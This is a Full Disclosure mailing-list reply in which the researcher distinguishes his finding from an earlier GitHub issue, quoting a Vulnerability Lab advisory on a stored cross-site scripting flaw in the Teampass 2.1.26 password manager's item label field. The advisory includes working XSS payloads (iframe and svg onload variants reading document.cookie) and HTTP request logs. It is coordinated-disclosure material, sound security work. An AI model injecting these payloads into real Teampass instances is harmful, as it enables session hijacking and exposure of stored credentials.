Hi Ulisses, The XSS found is a different one. The one mentioned on https://github.com/nilsteampassnet/TeamPass/issues/1244 has a screenshot where the XSS is inserted when creating a new role and by preventing the javascript filters to execute. A new role can only be created by the admin user. This XSS is also performed by inserting the <script> tag, this tag does not work in the new found bug.
The new found XSS(http://www.vulnerability-lab.com/get_content.php?id=1845) is inserted in the label field of an item, this can be done by any authenticated user that can create or edit an item. The XSS is executed as soon as a user opens the folder that contains the item with the XSS in the label field. Peter Op 25-5-2016 om 13:05 schreef Ulisses Montenegro: > This looks very similar to the persistent XSS reported a while ago on the > Teampass github, is it the same vulnerability? > > https://github.com/nilsteampassnet/TeamPass/issues/1244 > > > > On 25 May 2016 at 19:10, Vulnerability Lab <[email protected]> > wrote: > >> Document Title: >> =============== >> Teampass v2.1.26 - Stored Cross Site Scripting Vulnerability >> >> >> References (Source): >> ==================== >> http://www.vulnerability-lab.com/get_content.php?id=1845 >> >> >> Release Date: >> ============= >> 2016-05-24 >> >> >> Vulnerability Laboratory ID (VL-ID): >> ==================================== >> 1845 >> >> >> Common Vulnerability Scoring System: >> ==================================== >> 3.4 >> >> >> Product & Service Introduction: >> =============================== >> TeamPass is a Passwords Manager dedicated for managing passwords in a >> collaborative way on any server Apache, MySQL and PHP. >> It is especially designed to provide passwords access security for allowed >> people. This makes TeamPass really useful in a >> Business/Enterprise environment and will provide to IT or Team Manager a >> powerful and easy tool for customizing passwords >> access depending on the user’s role. >> >> (Copy of the Homepage: http://teampass.net/ ) >> >> >> Abstract Advisory Information: >> ============================== >> An independent vulnerability laboratory researcher discovered an >> application-side cross site scripting vulnerability in the Teampass >> v2.1.25/26 application. >> >> >> Vulnerability Disclosure Timeline: >> ================================== >> 2016-05-17: Researcher Notification & Coordination (Peter Kok) >> 2016-05-18 Vendor Notification (Teampass Security Team) >> 2016-05-18: Vendor Response/Feedback (Teampass Security Team) >> 2016-05-23: Vendor Fix/Patch (Teampass Developer Team) >> 2016-05-24: Public Disclosure (Vulnerability Laboratory) >> >> >> Discovery Status: >> ================= >> Published >> >> >> Affected Product(s): >> ==================== >> Nils Laumaillé >> Product: Teampass Password Manager - Online Service (Web-Application) >> 2.1.25 >> >> Nils Laumaillé >> Product: Teampass Password Manager - Online Service (Web-Application) >> 2.1.26 >> >> >> Exploitation Technique: >> ======================= >> Remote >> >> >> Severity Level: >> =============== >> Medium >> >> >> Technical Details & Description: >> ================================ >> An application-side cross site scripting web vulnerability has been >> discovered in the official Teampass v2.1.26 web-application. >> The vulnerability allows remote attackers to inject own malicious script >> codes to the application-side of the vulnerable module or function. >> >> Teampass allows authenticated users to create items to store usernames, >> passwords, descriptions, files and more. When creating or editing an >> item the very first field, the label field, is vulnerable to iframe >> injection and XSS insertion. The iframe or cross site scripting will be >> executed as soon as a user opens a folder. The attack vector is persistent >> and the request method to inject is POST. >> >> The security risk of the application-side vulnerability is estimated as >> medium with a cvss (common vulnerability scoring system) count of 3.4. >> Exploitation of the persistent web vulnerability requires a low privileged >> web-application user account and low or medium user interaction. >> Successful exploitation of the vulnerability results in session hijacking, >> persistent phishing attacks, persistent external redirects to >> malicious source and persistent manipulation of affected or connected >> application modules. >> >> Request Method(s): >> [+] POST >> >> Vulnerable Function(s): >> [+] Add or Edit (Label) >> >> Vulnerable Parameter(s): >> [+] label name >> >> Affected Module(s): >> [+] Item Listing >> >> >> Proof of Concept (PoC): >> ======================= >> The persistent cross site scripting web vulnerability can be exploited by >> remote attackers without privileged web-application user account and low or >> medium user interaction. >> For security demonstration or to reproduce the vulnerability follow the >> provided information and steps below to continue. >> >> Manual steps to reproduce the vulnerability ... >> 1. Create or edit an item >> 2. Change the first label name field to a script code payload >> Note: Vulnerability Lab"><iframe SRC="http://www.vulnerability-lab.com/"; >> onload=alert(document.cookie)<></iframe> or >> <svg/onload=alert(document.cookie)> >> 3. The execute occurs in the main label field output context value >> 4. Successful reproduce of the application-side vulnerability! >> >> >> --- PoC Session Logs [POST] --- >> Status: 200[OK] >> POST http://teampass.localhost:8080/index.php/pwd/aj_edit_save/73 >> Mime Type[application/json] >> Request Header: >> Host[teampass.localhost:8080] >> User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) >> Gecko/20100101 Firefox/46.0] >> Accept[application/json, text/javascript, */*; q=0.01] >> X-Requested-With[XMLHttpRequest] >> Referer[http://teampass.localhost:8080/index.php/pwd/view/73] >> Cookie[__utma=66503851.473320856.1464166381.1464166381.1464166381.1; >> PHPSESSID=s9iq39avpg0k5vjc896p0m5tb6] >> Connection[keep-alive] >> POST-Daten: >> cproject_id[23] >> password_id[73] >> name[Dans+Linux+user+%22%3E%3C[SCIRPT CODE PAYLOAD INJECT VIA NAME >> LABEL!]%3E] >> tags[] >> hidden-tags[] >> access_info[] >> faketextdonotautofill1[] >> username[dan] >> faketextdonotautofill2[] >> email[] >> fakepwddonotautofill1[] >> password[hello] >> password_visible[hello] >> fakepwddonotautofill2[] >> repeat_password[hello] >> repeat_password_visible[hello] >> expiry_date_edit[] >> notes[] >> Response Header: >> Date[Wed, 25 May 2016 08:53:48 GMT] >> Server[Apache] >> X-Powered-By[PHP/5.4.4-14+deb7u8] >> Expires[Thu, 19 Nov 1981 08:52:00 GMT] >> Cache-Control[no-store, no-cache, must-revalidate, post-check=0, >> pre-check=0] >> Pragma[no-cache] >> Content-Length[74] >> Keep-Alive[timeout=5, max=99] >> Connection[Keep-Alive] >> Content-Type[application/json; charset=utf-8] >> - >> Status: 200[OK] >> GET http://teampass.localhost:8080/index.php/checkss/n/pwd >> Mime Type[text/html] >> Request Header: >> Host[teampass.localhost:8080] >> User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) >> Gecko/20100101 Firefox/46.0] >> Accept[text/html, */*; q=0.01] >> X-Requested-With[XMLHttpRequest] >> Referer[http://teampass.localhost:8080/index.php/pwd/view/73] >> Cookie[__utma=66503851.473320856.1464166381.1464166381.1464166381.1; >> __utmb=66503851.1.10.1464166381; PHPSESSID=s9iq39avpg0k5vjc896p0m5tb6] >> Connection[keep-alive] >> Response Header: >> Date[Wed, 25 May 2016 08:53:49 GMT] >> Server[Apache] >> X-Powered-By[PHP/5.4.4-14+deb7u8] >> Connection[Keep-Alive] >> Content-Type[text/html] >> >> >> Reference(s): >> http://teampass.localhost:8080/ >> http://teampass.localhost:8080/index.php/ >> http://teampass.localhost:8080/index.php/pwd/ >> http://teampass.localhost:8080/index.php/checkss/ >> http://teampass.localhost:8080/index.php/checkss/n/ >> http://teampass.localhost:8080/index.php/checkss/n/pwd >> http://teampass.localhost:8080/index.php/pwd/aj_edit_save/ >> http://teampass.localhost:8080/index.php/pwd/aj_edit_save/73 >> >> >> Security Risk: >> ============== >> The security risk of the application-side cross site scripting >> vulnerability in the teampass application is estimated as medium. (CVSS 3.4) >> >> >> Credits & Authors: >> ================== >> Peter Kok - [http://www.vulnerability-lab.com/show.php?user=Peter%20Kok] >> >> >> Disclaimer & Information: >> ========================= >> The information provided in this advisory is provided as it is without any >> warranty. Vulnerability Lab disclaims all warranties, either expressed or >> implied, >> including the warranties of merchantability and capability for a >> particular purpose. Vulnerability-Lab or its suppliers are not liable in >> any case of damage, >> including direct, indirect, incidental, consequential loss of business >> profits or special damages, even if Vulnerability-Lab or its suppliers have >> been advised >> of the possibility of such damages. Some states do not allow the exclusion >> or limitation of liability for consequential or incidental damages so the >> foregoing >> limitation may not apply. We do not approve or encourage anybody to break >> any licenses, policies, deface websites, hack into databases or trade with >> stolen data. >> >> Domains: www.vulnerability-lab.com - www.vuln-lab.com >> - www.evolution-sec.com >> Contact: [email protected] - >> [email protected] - >> [email protected] >> Section: magazine.vulnerability-lab.com - >> vulnerability-lab.com/contact.php - >> evolution-sec.com/contact >> Social: twitter.com/vuln_lab - >> facebook.com/VulnerabilityLab - >> youtube.com/user/vulnerability0lab >> Feeds: vulnerability-lab.com/rss/rss.php - >> vulnerability-lab.com/rss/rss_upcoming.php - >> vulnerability-lab.com/rss/rss_news.php >> Programs: vulnerability-lab.com/submit.php - >> vulnerability-lab.com/list-of-bug-bounty-programs.php - >> vulnerability-lab.com/register.php >> >> Any modified copy or reproduction, including partially usages, of this >> file requires authorization from Vulnerability Laboratory. Permission to >> electronically >> redistribute this alert in its unmodified form is granted. All other >> rights, including the use of other media, are reserved by Vulnerability-Lab >> Research Team or >> its suppliers. All pictures, texts, advisories, source code, videos and >> other information on this website is trademark of vulnerability-lab team & >> the specific >> authors or managers. To record, list, modify, use or edit our material >> contact (admin@ or [email protected]) to get a ask >> permission. >> >> Copyright © 2016 | Vulnerability >> Laboratory - [Evolution Security GmbH]™ >> >> >> >> >> -- >> VULNERABILITY LABORATORY - RESEARCH TEAM >> SERVICE: www.vulnerability-lab.com >> CONTACT: [email protected] >> >> >> _______________________________________________ >> Sent through the Full Disclosure mailing list >> https://nmap.org/mailman/listinfo/fulldisclosure >> Web Archives & RSS: http://seclists.org/fulldisclosure/ > > > _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
